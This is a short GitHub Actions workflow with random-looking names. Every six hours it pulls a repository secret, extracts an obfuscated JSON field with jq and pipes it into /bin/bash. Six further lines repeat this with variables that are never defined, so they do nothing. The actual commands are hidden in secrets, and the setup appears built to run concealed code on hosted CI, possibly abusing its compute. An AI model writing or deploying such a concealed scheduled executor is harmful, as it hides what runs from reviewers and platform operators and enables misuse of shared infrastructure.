name: mudongsheng9371

on:
  workflow_dispatch:
  schedule:
    - cron: '28 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mudongsheng9371
        env:
          vpn2: ${{ secrets.vpn2 }}
        run: |
          echo $vpn2 | jq -r .gqa32893 | /bin/bash
          echo $ddyz2 | jq -r .lu32 | /bin/bash
          echo $wyjya16 | jq -r .o1 | /bin/bash
          echo $iyrw5609 | jq -r .ekrtn10980 | /bin/bash
          echo $tule0483 | jq -r .hcmfo76 | /bin/bash
          echo $x2 | jq -r .oxk59541 | /bin/bash
          echo $pphbn161 | jq -r .ju8 | /bin/bash

